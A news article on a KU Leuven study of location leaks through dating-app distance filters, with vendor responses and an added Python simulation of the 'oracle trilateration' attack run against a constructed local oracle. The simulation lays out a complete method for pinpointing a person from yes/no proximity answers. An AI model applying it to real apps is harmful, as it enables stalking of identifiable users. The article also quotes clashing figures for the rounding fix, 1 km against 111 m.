A recent study revealed that vulnerabilities in the design of several dating apps, including popular ones like Bumble and Hinge, enabled malicious users or stalkers to pinpoint the location of their victims to within 2 meters. Researchers from the Belgian university KU Leuven discovered these vulnerabilities while analyzing 15 popular dating apps. Among those, Badoo, Bumble, Grindr, happn, Hinge, and Hily were found to have the same issue, which could potentially allow a malicious user to identify another user’s near-exact location.
Although these apps do not reveal exact locations in the distance shown on a profile, their "filters" feature evaluates distance against users' precise coordinates. Filters let users narrow their search for a partner by criteria such as age, height, relationship type and, importantly, distance, and it is the yes/no answer of that distance filter that leaks more than the displayed figure.
The researchers used a technique they call "oracle trilateration" to pinpoint a target user's location. Classical trilateration needs three exact distance measurements to the target and intersects the corresponding circles around the measuring points. Oracle trilateration needs only a boolean answer: the distance filter acts as an oracle that reports whether the target is within a chosen radius of the attacker's position. The attacker starts from a rough estimate of the victim's location (for example from the profile), moves their own position outward in small increments until the victim drops out of the filter, and records that point; it lies at exactly the filter radius from the victim. Repeating this in three directions yields three points at a known distance from the victim, and their intersection, found by ordinary trilateration, is the victim's position.
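The attack described above as an added simulation (this is not the KU Leuven researchers' code). It assumes the app exposes a boolean oracle "is the target within R metres of my reported position?", that the attacker can set their own reported position freely (GPS spoofing), and that the attacker already has a rough fix on the victim from the profile. Coordinates and the `FILTER_RADIUS_M`, `ROUGH_GUESS` and `VICTIM` values are constructed for the example. The same block also models the mitigation discussed later on the page (rounding the victim's coordinates before the filter compares them) so the residual error can be measured.

```python
"""Oracle trilateration against a distance-filter oracle (added simulation)."""
import math

EARTH_RADIUS_M = 6_371_000.0
M_PER_DEG = EARTH_RADIUS_M * math.pi / 180   # metres per degree on the sphere


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres, as a server-side filter would compute it."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp, dl = p2 - p1, math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def make_oracle(victim_lat, victim_lon, radius_m, decimals=None):
    """The app's distance filter as an oracle. decimals=None compares against the
    victim's exact coordinates (vulnerable); decimals=3 rounds them first (the
    mitigation). Returns (oracle, query counter)."""
    if decimals is not None:
        victim_lat, victim_lon = round(victim_lat, decimals), round(victim_lon, decimals)
    queries = {"n": 0}

    def within(lat, lon):
        queries["n"] += 1
        return haversine_m(lat, lon, victim_lat, victim_lon) <= radius_m
    return within, queries


def offset(lat, lon, bearing_deg, dist_m):
    """Point dist_m metres from (lat, lon) along a compass bearing (flat-earth
    approximation, adequate over a few kilometres)."""
    b = math.radians(bearing_deg)
    return (lat + dist_m * math.cos(b) / M_PER_DEG,
            lon + dist_m * math.sin(b) / (M_PER_DEG * math.cos(math.radians(lat))))


def to_xy(point, origin):
    """Local east/north metres relative to origin."""
    (lat, lon), (lat0, lon0) = point, origin
    return ((lon - lon0) * M_PER_DEG * math.cos(math.radians(lat0)), (lat - lat0) * M_PER_DEG)


def from_xy(xy, origin):
    (x, y), (lat0, lon0) = xy, origin
    return lat0 + y / M_PER_DEG, lon0 + x / (M_PER_DEG * math.cos(math.radians(lat0)))


def find_boundary(oracle, start, bearing_deg, radius_m, tol_m=0.25):
    """Walk outward from a start point inside the filter radius until the victim
    drops out, bisecting the crossing. The returned point lies (within tol_m)
    on the circle of radius radius_m around the victim."""
    lat0, lon0 = start
    assert oracle(lat0, lon0), "rough guess must be inside the filter radius"
    inside, outside = 0.0, 2 * radius_m            # distances along the bearing
    assert not oracle(*offset(lat0, lon0, bearing_deg, outside))
    while outside - inside > tol_m:
        mid = (inside + outside) / 2
        if oracle(*offset(lat0, lon0, bearing_deg, mid)):
            inside = mid
        else:
            outside = mid
    return offset(lat0, lon0, bearing_deg, (inside + outside) / 2)


def trilaterate(points, origin):
    """Three points at the same distance from the victim pin it to their
    circumcentre: subtracting the circle equations pairwise cancels the radius
    and leaves a 2x2 linear system."""
    (x1, y1), (x2, y2), (x3, y3) = (to_xy(p, origin) for p in points)
    a1, b1, c1 = 2 * (x2 - x1), 2 * (y2 - y1), x2**2 - x1**2 + y2**2 - y1**2
    a2, b2, c2 = 2 * (x3 - x1), 2 * (y3 - y1), x3**2 - x1**2 + y3**2 - y1**2
    det = a1 * b2 - a2 * b1       # non-zero because the three points are not collinear
    return from_xy(((c1 * b2 - c2 * b1) / det, (a1 * c2 - a2 * c1) / det), origin)


def oracle_trilateration(oracle, rough_guess, radius_m, bearings=(0, 120, 240)):
    """Full attack: a boundary crossing in each of three directions, then solve."""
    return trilaterate([find_boundary(oracle, rough_guess, b, radius_m) for b in bearings],
                       rough_guess)


def rounding_bound_m(lat, decimals):
    """Worst-case distance between a true position and its rounded grid point
    (half the diagonal of one grid cell at this latitude)."""
    half = 0.5 * 10 ** -decimals
    return math.hypot(half * M_PER_DEG, half * M_PER_DEG * math.cos(math.radians(lat)))


# Constructed scenario: victim near Leuven, attacker's guess ~360 m off, 1 km filter.
VICTIM = (50.87984, 4.70062)
ROUGH_GUESS = (50.8770, 4.7030)
FILTER_RADIUS_M = 1000.0


def run_attack(decimals=None):
    """Returns (metres between estimate and true position, number of oracle queries)."""
    oracle, queries = make_oracle(*VICTIM, FILTER_RADIUS_M, decimals)
    estimate = oracle_trilateration(oracle, ROUGH_GUESS, FILTER_RADIUS_M)
    return haversine_m(*estimate, *VICTIM), queries["n"]


if __name__ == "__main__":
    for d in (None, 3):
        err, n = run_attack(d)
        print(f"rounding={d}: error {err:.1f} m after {n} oracle queries")
    print(f"worst case with 3-decimal rounding here: {rounding_bound_m(VICTIM[0], 3):.0f} m")
```

Against the exact-coordinate oracle the estimate lands within a metre of the victim after a few dozen yes/no queries, which is the practical point: the filter never returns a distance, yet its threshold behaviour is enough. Against the rounded oracle the same attack converges on the grid point instead, so the residual error is bounded by half a grid cell rather than by the probing precision.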
“It was somewhat surprising that known issues were still present in these popular apps,” said Karel Dhondt, one of the researchers. Although this technique doesn’t reveal the exact GPS coordinates of the victim, “I’d say 2 meters is close enough to pinpoint the user,” Dhondt added.
Fortunately, all the apps with these vulnerabilities have since changed how their distance filters work. The researchers noted that the fix involved rounding the coordinates the filter uses to three decimal places, making them less precise, and that this adjustment is said to introduce an uncertainty of approximately one kilometer. For scale, one thousandth of a degree of latitude is about 111 meters, the figure cited for Grindr below, while a kilometer of uncertainty corresponds to rounding to two decimal places.
Bumble’s vice president of global communications, Gabrielle Ferree, stated that the company became aware of these findings in early 2023 and quickly resolved the issues, which also affected Badoo, owned by Bumble. Similarly, Dmytro Kononov, CTO and co-founder of Hily, reported that the company received the vulnerability report in May 2023 and took steps to eliminate the potential for trilateration attacks through new geocoding algorithms.
A Hinge spokesperson confirmed that the company “immediately took action” upon receiving the researchers’ report in early 2023. Happn CEO and president Karima Ben Abdelmalek added that, although their app has an additional layer of protection beyond rounding distances, they still engaged with the researchers to ensure the trilateration technique was ineffective.
The study also found that Grindr users could be located to within approximately 111 meters of their exact coordinates. While this is less precise than the 2 meters found in other apps, it still poses potential risks, especially in densely populated areas. Grindr rounds users' precise coordinates to three decimal places, which snaps each user onto a grid with roughly 111-meter spacing, so trilateration recovers the grid point rather than the true position. According to the company, this is a feature rather than a bug.
Kelly Peterson Miranda, chief privacy officer at Grindr, highlighted the importance of proximity for their users, many of whom rely on Grindr to connect with the LGBTQ+ community. Users can choose to disable their distance display if they prefer, maintaining control over their location information.